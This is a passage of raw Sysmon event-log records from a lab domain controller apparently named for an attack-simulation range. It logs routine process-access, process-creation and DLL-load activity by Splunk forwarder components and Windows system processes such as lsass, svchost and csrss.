Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.315{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8ED0-6005-9400-00000000A301}4344C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.315{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8ED0-6005-9400-00000000A301}4344C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.127{59A5CD1D-8EEF-6005-E600-00000000A301}43121752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.924{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EF1-6005-E900-00000000A301}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.909{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EF1-6005-E900-00000000A301}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.909{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EF1-6005-E900-00000000A301}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.922{59A5CD1D-8EF1-6005-E900-00000000A301}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x80000000000000004321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.502{59A5CD1D-8EF1-6005-E800-00000000A301}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000004320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.502{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8EF1-6005-E800-00000000A301}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.502{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8EF1-6005-E800-00000000A301}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.487{59A5CD1D-8EF1-6005-E800-00000000A301}44924496C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+577205|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+576d36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+56c09|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+572d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+8fe2c4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EF1-6005-E800-00000000A301}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 